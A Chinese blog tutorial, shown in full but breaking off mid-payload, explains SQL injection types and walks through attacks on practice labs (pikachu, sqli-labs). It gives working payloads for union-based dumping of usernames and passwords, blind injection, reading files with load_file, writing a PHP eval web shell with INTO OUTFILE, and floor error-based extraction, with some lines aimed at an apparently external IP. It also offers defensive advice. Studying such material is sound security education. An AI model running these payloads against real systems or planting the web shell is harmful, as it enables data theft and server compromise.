<!DOCTYPE html>
<html>
  <!-- meta/link... -->
  



<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <!-- Global site tag (gtag.js) - Google Analytics -->


  <title>SQL注入漏洞详解 | YY&#39;s Blog</title>

  <link rel="icon" type="image/jpeg" href="/medias/favicon.jpg">
  <link rel="stylesheet" href="https://at.alicdn.com/t/font_1911880_c1nvbyezg17.css">
  <link href="https://unpkg.com/@fortawesome/fontawesome-free/css/all.min.css" rel="stylesheet">
  <link href="/js/swiper/swiper@5.4.1.min.css" rel="stylesheet">
  
  
  
  
<link rel="stylesheet" href="/css/animate.min.css">

  
<link rel="stylesheet" href="/css/style.css">

  
  
    
<link rel="stylesheet" href="/js/fancybox/jquery.fancybox.min.css">

  
  
    
<link rel="stylesheet" href="/js/shareJs/share.min.css">

  
  <style>
        @media (max-width: 992px) {
            #waifu {
                display: none;
            }
        }
    </style>
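    <!-- NOTE(review): third-party CDN assets are loaded without an integrity attribute; add SRI (integrity + crossorigin) or self-host them. Explicit https: replaces the protocol-relative URL so the script is never fetched over plain HTTP. -->
    <script src="https://cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="https://cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">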

    
        <script src="/js/valine/index.js"></script>
    

    
<meta name="generator" content="Hexo 5.4.0"></head>

  
  <!-- 依赖于jquery和vue -->
  
    
<script src="https://unpkg.com/jquery@3.5.1/dist/jquery.min.js"></script>

  

  
    
<script src="https://unpkg.com/vue@2.6.11/dist/vue.min.js"></script>

  
  
  <body>

    
    <!-- 判断是否为暗黑风格 -->
    <!-- 判断是否为黑夜模式 -->
<script>
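  // Read the persisted theme flag. localStorage content is user-controllable and may be
  // missing, malformed, or inaccessible (storage blocked), so any failure falls back to
  // light mode instead of aborting the script with an uncaught exception.
  let isDark = false;
  try {
    isDark = JSON.parse(localStorage.getItem('dark')) || false;
  } catch (e) {
    isDark = false;
  }

  // Apply the dark theme class only when the stored flag is truthy.
  if (isDark) {
    $(document.body).addClass('darkModel');
  }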
</script>

    <!-- 需要在上面加载的js -->
    <script>
  /**
   * Inject a <script> element for `src` into the document and resolve once it has loaded.
   *
   * @param {string} src - URL of the script. It is assigned to the element unvalidated,
   *   so callers must only pass trusted URLs.
   * @param {Function|Object} [cb] - Either a function to run on load, or an object whose
   *   properties are copied onto the script element (an `onload` property is wrapped so
   *   the promise still resolves).
   * @returns {Promise} Resolves when the script's load event fires. No error handler is
   *   installed here, so a failed load leaves the promise pending.
   */
  function loadScript(src, cb) {
    return new Promise(resolve => {
      // Defer the DOM work to a later task.
      setTimeout(function () {
        var HEAD = document.getElementsByTagName("head")[0] || document.documentElement;
        var script = document.createElement("script");
        script.setAttribute("type", "text/javascript");
        if (cb) {
          // JSON.stringify returns undefined for a function, so this branch is taken
          // for object-style options and the else branch for a plain callback.
          if (JSON.stringify(cb)) {
            for (let p in cb) {
              if (p == "onload") {
                // Run the caller's onload first, then settle the promise.
                script[p] = () => {
                  cb[p]()
                  resolve()
                }
              } else {
                // Copy any other option onto the element as a property.
                // NOTE(review): this also resets script.onload to resolve, which
                // replaces the wrapper above if "onload" was iterated earlier.
                script[p] = cb[p]
                script.onload = resolve
              }
            }
          } else {
            // Function-style callback: call it, then resolve.
            script.onload = () => {
              cb()
              resolve()
            };
          }
        } else {
          script.onload = resolve
        }
        // NOTE(review): no integrity attribute is set unless the caller supplies one
        // through the options object.
        script.setAttribute("src", src);
        HEAD.appendChild(script);
      });
    });
  }

  //https://github.com/filamentgroup/loadCSS
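  /**
   * Append a stylesheet <link> for `href` to <head> and resolve once it has loaded.
   *
   * @param {string} href - URL of the stylesheet; callers must only pass trusted URLs.
   * @param {*} [before] - Accepted for signature compatibility; not used.
   * @param {*} [media] - Accepted for signature compatibility; not used.
   * @param {*} [attributes] - Accepted for signature compatibility; not used.
   * @returns {Promise} Resolves when the link's load event fires.
   */
  var loadCSS = function (href, before, media, attributes) {
    return new Promise(resolve => {
      // Defer the DOM work to a later task.
      setTimeout(function () {
        var link = document.createElement('link');
        link.rel = "stylesheet";
        // Fix: the original assigned the undefined name `src`, which threw a
        // ReferenceError, so the stylesheet was never attached.
        link.href = href;
        link.onload = resolve;
        document.getElementsByTagName("head")[0].appendChild(link);
      });
    });
  };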

</script> 

<!-- 轮播图所需要的js -->
<script src="/js/swiper/swiper.min.js"></script>
<script src="/js/swiper/vue-awesome-swiper.js"></script>
<script src="/js/swiper/swiper.animate1.0.3.min.js"></script>

<script type="text/javascript">
  Vue.use(window.VueAwesomeSwiper)
</script>


  <script src="/js/vue-typed-js/index.js"></script>


<!-- 首页的公告滚动插件的js需要重新加载 -->
<script src="/js/vue-seamless-scroll/index.js"></script>

<!-- 打字机效果js -->
<script src="https://unpkg.com/typed.js@2.0.11"></script>


    <div id="safearea">
      <main class="main" id="pjax-container">
        <!-- 内容区域 -->
        
 <!-- prismjs 代码高亮 -->
 


<div class="bg-dark-floor" style="position: fixed;left: 0;top: 0;width: 100%;height: 100%;z-index: -1;"></div>


  <!-- 文章详情页顶部图片和标题 -->




<div class="post-detail-header" id="thumbnail_canvas" style="background-repeat: no-repeat; background-size: cover; 
  background-position: center center;position: relative;background-image:url('/medias/4.jpg')">
  <div class="post-detail-header-mask"></div>
  <canvas id="header_canvas"style="position:absolute;bottom:0;pointer-events:none;"></canvas>
  
  <div class="post-detail-header_info-box">
    <div class="title-box">
      <span class="title">
        SQL注入漏洞详解
      </span>
    </div>
    
    
      
        <span class="post-detail-header_date">
          <i class="fas fa-calendar"></i> 发表于：2021-06-27 |
        </span>
      

      

      
        <div class="post-detail-header_wordcount">
          <span class="totalcount">
            <i class="fas fa-file-text-o"></i> 字数统计: 5.9k |
          </span>
  
          <span class="min2read">
            <i class="fas fa-clock"></i> 阅读时长: 23分钟 |
          </span>
  
          
            <span class="reading">
              <i class="fas fa-eye"></i> 阅读量：<span id="busuanzi_value_page_pv"></span>
            </span>
          
        </div>
      
    
  </div>
  
  
    <script src="/js/bubble/bubble.js"></script>
  
</div>





<div class="row justify-position" 
  style="padding-top: 0px;">
  <div class="main-content">
    <article class="post post-detail">
      <div class="post-content">
        <h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><ul>
<li><p><strong>原理：</strong>就是通过把SQL命令<strong>插入</strong>到Web表单提交的内容、输入的域名或页面请求的查询字符串中，最终欺骗服务器执行恶意的SQL命令。</p>
<p>具体来说，它是利用现有应用程序，将（恶意的）SQL命令注入到后台数据库引擎中执行的能力：攻击者通过在Web表单中输入（恶意）SQL语句，就可以获取存在安全漏洞的网站上的数据库内容，而数据库并不是按照设计者的意图去执行SQL语句。其根本原因是应用程序把未经校验的用户输入直接拼接进了SQL语句；使用参数化查询（预编译语句）可以从源头上避免这一问题。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RY0WnS"><img src="https://z3.ax1x.com/2021/06/27/RY0WnS.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RY0WnS.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RY0WnS.png"></a></p>
</li>
</ul>
<h2 id="SQL注入的分类"><a href="#SQL注入的分类" class="headerlink" title="SQL注入的分类"></a>SQL注入的分类</h2><ul>
<li><p><strong>依据注入点类型分类</strong></p>
<ul>
<li>数字类型的注入</li>
<li>字符串类型的注入</li>
<li>搜索型注入</li>
</ul>
</li>
<li><p><strong>依据提交方式分类</strong></p>
<ul>
<li>GET注入</li>
<li>POST注入</li>
<li>COOKIE注入</li>
<li>HTTP头注入(<a target="_blank" rel="noopener" href="https://www.cnblogs.com/aw4ke/p/11905576.html">XFF注入</a>、UA注入、REFERER注入）</li>
</ul>
</li>
<li><p><strong>依据获取信息的方式分类</strong></p>
<ul>
<li><p>盲注</p>
<ul>
<li>基于布尔的盲注</li>
<li>基于时间的盲注</li>
</ul>
</li>
<li><p>基于报错的注入</p>
</li>
<li><p>union</p>
<ul>
<li>联合查询注入</li>
<li>堆查询注入 (可同时执行多条语句)</li>
</ul>
</li>
</ul>
</li>
<li><p>编码问题</p>
<ul>
<li>宽字节注入</li>
</ul>
</li>
</ul>
<h2 id="怎么判断存在SQL注入"><a href="#怎么判断存在SQL注入" class="headerlink" title="怎么判断存在SQL注入"></a>怎么判断存在SQL注入</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">方法：</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="number">1.</span>整形参数判断</span><br><span class="line"></span><br><span class="line">通常news.asp中<span class="keyword">SQL</span>语句原貌大致如下：<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> 表名 <span class="keyword">where</span> 字段<span class="operator">=</span>xx，所以可以用以下步骤测试<span class="keyword">SQL</span>注入是否存在。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">最简单的判断方法：http:<span class="operator">/</span><span class="operator">/</span>xxx<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx’(附加一个单引号)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span 
class="number">2.</span> 字符串型参数判断</span><br><span class="line"></span><br><span class="line">通常news.asp中<span class="keyword">SQL</span>语句原貌大致如下：</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> 表名 <span class="keyword">where</span> 字段<span class="operator">=</span><span class="string">&#x27;xx&#x27;</span>，所以可以用以下步骤测试<span class="keyword">SQL</span>注入是否存在。</span><br><span class="line"></span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span>xxx<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx’(附加一个单引号)，此时news.asp中的<span class="keyword">SQL</span>语句变成了</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> 表名 <span class="keyword">where</span> 字段<span class="operator">=</span>xx’，news.asp运行异常；</span><br><span class="line"></span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span>xxx<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx <span class="keyword">and</span> <span class="string">&#x27;1&#x27;</span><span class="operator">=</span><span class="string">&#x27;1&#x27;</span>, news.asp运行正常，</span><br><span class="line"></span><br><span class="line">而且与 http:<span class="operator">/</span><span class="operator">/</span>www.hackbase.com<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx运行结果相同；</span><br><span class="line"></span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span>xxx<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx <span class="keyword">and</span> <span class="string">&#x27;1&#x27;</span><span class="operator">=</span><span class="string">&#x27;2&#x27;</span>, news.asp运行异常；</span><br><span class="line"></span><br><span 
class="line">如果以上满足，则news.asp存在<span class="keyword">SQL</span>注入漏洞，反之则不能注入</span><br></pre></td></tr></table></figure>

<h4 id="Boolean盲注"><a href="#Boolean盲注" class="headerlink" title="Boolean盲注"></a>Boolean盲注</h4><p><strong>盲注，</strong>就是在服务器没有错误回显时完成的注入攻击。服务器没有错误回显，对于攻击者来说缺少了非常重要的信息，所以攻击者必须找到一个方法来验证注入的SQL语句是否得到了执行。</p>
<p>下面我们打开pikachu测试平台（漏洞练习靶场），选择SQL盲注（Boolean）章节进行演示：</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrrtJ"><img src="https://z3.ax1x.com/2021/06/27/RYrrtJ.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrrtJ.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrrtJ.png"></a></p>
<p>先输入’ 测试一下反馈信息</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrWnK"><img src="https://z3.ax1x.com/2021/06/27/RYrWnK.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrWnK.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrWnK.png"></a></p>
<p>输入一个之前注册的真实信息</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrh7D"><img src="https://z3.ax1x.com/2021/06/27/RYrh7D.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrh7D.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrh7D.png"></a></p>
<p>发现反馈了正确信息；再输入kobe’ and 1=1#，发现反馈仍然为正确信息。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrItH"><img src="https://z3.ax1x.com/2021/06/27/RYrItH.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrItH.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrItH.png"></a></p>
<p>将1=1改成1=2，错误的值，发现报错。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrqjP"><img src="https://z3.ax1x.com/2021/06/27/RYrqjP.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrqjP.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrqjP.png"></a></p>
<p>所以，我们可以从and 1=1判断真假来做工作了，输入之前基于报错的字符kobe’ and ascii(substr(database(),1,1))&gt;113#，将database的名字取第一个字符，转换为asc码的形式进行对比。发现反馈输入错误。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrjHS"><img src="https://z3.ax1x.com/2021/06/27/RYrjHS.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrjHS.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrjHS.png"></a></p>
<p>反馈信息报错，依次修改113的数值，直到反馈正确信息。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrxAg"><img src="https://z3.ax1x.com/2021/06/27/RYrxAg.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrxAg.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrxAg.png"></a></p>
<p>这里到112的时候，显示正确信息，说明数据库名第一个字符的ASCII码为112，即小写字母p。<br>这里，就盲注完成了。</p>
<h4 id="union注入"><a href="#union注入" class="headerlink" title="union注入"></a>union注入</h4><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td 
class="code"><pre><span class="line">union联合查询适用于有显示列的注入。</span><br><span class="line"></span><br><span class="line">用sql-labs来学习</span><br><span class="line">这是第一个</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">一、判断是否用&#x27;做字符串引号</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27;and 1=1 --+</span><br><span class="line">正常输出</span><br><span class="line">出错代表没有闭合  说明没有用&#x27;  可能没有用&#x27; 或用了&quot;或()</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1%27and%201=2--+</span><br><span class="line">则是&#x27;&#x27;字符串注入</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">二、判断它所在的数据库有几列</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27;order by 3 --+ 判断是否有3列</span><br><span class="line">正常</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=1&#x27;order by 4 --+ 判断是否有4列</span><br><span class="line">错误</span><br><span class="line">说明它输出的内容所在的数据库有3列</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">四、判断他显示的内容在数据库的第几列</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,2,3 --+</span><br><span class="line">则 Your Login name 在第二列 Your Password在第三列</span><br><span class="line">我选择在第二列输出我想要的内容</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">五、查找出当前用户权限</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,user(),3 --+</span><br><span class="line">root权限</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">六、查找当前数据库</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,database(),3 --+</span><br><span class="line">当前数据库是 security</span><br><span class="line"></span><br><span class="line"></span><br><span 
class="line">七、查找security的表名</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,(select group_concat(table_name) from information_schema.tables where table_schema =&#x27;security&#x27;),3 --+ </span><br><span class="line">表名是 emails,referers,uagents,users</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">八 、查找users里的字段</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = &#x27;security&#x27; and table_name = &#x27;users&#x27;),3 --+</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">九、查找用户名</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,(select group_concat(username) from security.users),3 --+</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">十、查找密码</span><br><span class="line">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#x27; union select 1,(select group_concat(password) from security.users),3 --+</span><br><span class="line">这样 这个就完成了  已经拿到了账号密码 。</span><br></pre></td></tr></table></figure>

<p><strong>我们可以通过这些函数获得该数据库的一些重要的信息</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">version() ：数据库的版本     </span><br><span class="line"></span><br><span class="line">database() :当前所在的数据库   </span><br><span class="line"></span><br><span class="line">@<span class="variable">@basedir</span> :  数据库的安装目录</span><br><span class="line"></span><br><span class="line">@<span class="variable">@datadir</span> ：数据库文件的存放目录     </span><br><span class="line"></span><br><span class="line"><span class="keyword">user</span>() ：数据库的用户   </span><br><span class="line"></span><br><span class="line"><span class="built_in">current_user</span>() : 当前用户名</span><br><span class="line"></span><br><span class="line"><span class="built_in">system_user</span>() : 系统用户名     </span><br><span class="line"></span><br><span class="line"><span class="built_in">session_user</span>() :连接到数据库的用户名</span><br></pre></td></tr></table></figure>

<h4 id="文件读写"><a href="#文件读写" class="headerlink" title="文件读写"></a>文件读写</h4><p>当有显示列的时候，文件读可以利用 union 注入。当没有显示列的时候，只能利用盲注进行数据读取；</p>
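<p>文件写入只能利用 union 注入。无论读取还是写入，都要求当前数据库账号拥有 FILE 权限，并且受 MySQL 的 secure_file_priv 配置约束；因此应用连接数据库的账号不应授予 FILE 权限，secure_file_priv 也应设置为专用目录或 NULL。</p>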
<p>示例：读取e盘下3.txt文件</p>
<ul>
<li><strong>union注入读取文件</strong></li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span><span class="keyword">union</span>注入读取 e:<span class="operator">/</span><span class="number">3.</span>txt 文件</span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27;   union select 1,2,load_file(&quot;e:/3.txt&quot;)#</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">//也可以把 e:/3.txt 转换成16进制 0x653a2f332e747874</span></span><br><span class="line"><span class="string">http://127.0.0.1/sqli/Less-1/?id=-1&#x27;</span>   <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,load_file(<span class="number">0x653a2f332e747874</span>)#</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYyqw8"><img src="https://z3.ax1x.com/2021/06/27/RYyqw8.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYyqw8.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYyqw8.png"></a></p>
<p>盲注读取文件</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span>盲注读取的话就是利用hex函数，将读取的字符串转换成<span class="number">16</span>进制，再利用ascii函数，转换成ascii码，再利用二分法一个一个的判断字符，很复杂，一般结合工具完成</span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27; and ascii(mid((select hex(load_file(&#x27;</span>e:<span class="operator">/</span><span class="number">3.</span>txt<span class="string">&#x27;))),18,1))&gt;49#&#x27;</span> LIMIT <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>



<ul>
<li><p>union写入文件</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span>利用<span class="keyword">union</span>注入写入一句话木马  <span class="keyword">into</span> outfile 和 <span class="keyword">into</span> dumpfile 都可以</span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27;  union select 1,2,&#x27;</span><span class="operator">&lt;</span>?php <span class="variable">@eval</span>($_POST[aaa]);?<span class="operator">&gt;</span><span class="string">&#x27;  into outfile  &#x27;</span>e:<span class="operator">/</span><span class="number">4.</span>php<span class="string">&#x27; #</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">// 可以将一句话木马转换成16进制的形式</span></span><br><span class="line"><span class="string">http://127.0.0.1/sqli/Less-1/?id=-1&#x27;</span>  <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">0x3c3f70687020406576616c28245f504f53545b6161615d293b3f3e</span>  <span class="keyword">into</span> outfile  <span class="string">&#x27;e:/4.php&#x27;</span> #</span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4><p><strong>利用前提:</strong> 页面上没有显示位，但是需要输出 SQL 语句执行错误信息。比如 mysql_error()<br>优点: 不需要显示位<br>缺点: 需要输出 mysql_error( )的报错信息<br>防御上，生产环境不应把 mysql_error() 等数据库报错原文输出到页面，同时仍需用参数化查询消除注入本身。</p>
<ul>
<li><h3 id="floor报错注入"><a href="#floor报错注入" class="headerlink" title="floor报错注入"></a><strong>floor报错注入</strong></h3><p>floor报错注入是利用 count()、rand()、floor() 这三个函数与 group by 子句结合使用时产生的报错来回显数据的注入方式，四者缺一不可。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span> 我们可以将 <span class="keyword">user</span>() 改成任何函数，以获取我们想要的信息。具体可以看文章开头关于information_schema数据库的部分</span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27;  and (select 1 from (select count(*) from information_schema.tables group by concat(user(),floor(rand(0)*2)))a) #</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">//将其分解</span></span><br><span class="line"><span class="string">(select 1 from (Y)a)</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">Y= select count(*) from information_schema.tables group by concat(Z)</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">Z= user(),floor(rand(0)*2)           //将这里的 user() 替换成我们需要查询的函数</span></span><br></pre></td></tr></table></figure>

<p><strong>payload:</strong> and (select 1 from (select count(*),concat((database()),floor(rand(0)*2))x from information_schema.tables group by x)a)</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RY6VfJ"><img src="https://z3.ax1x.com/2021/06/27/RY6VfJ.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RY6VfJ.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RY6VfJ.png"></a></p>
</li>
<li><p>floor报错注入总结</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">这里其实是二次查询注入</span><br><span class="line">这里在利用相关函数时，使用了两次select查询</span><br><span class="line">公式：</span><br><span class="line">?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(测试语句))a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查看当前数据库版本：</span><br><span class="line">?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),version())a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查看数据库名：</span><br><span class="line">?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),database())a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查询表名：</span><br><span class="line">http://222.18.158.243:4606/?id=1 and 1=2  union select 1 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 1,1))a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查询字段名：</span><br><span class="line">http://222.18.158.243:4606/?id=1 and 1=2  union select 1 from (select+count(*),concat(floor(rand(0)*2),(select column_name from 
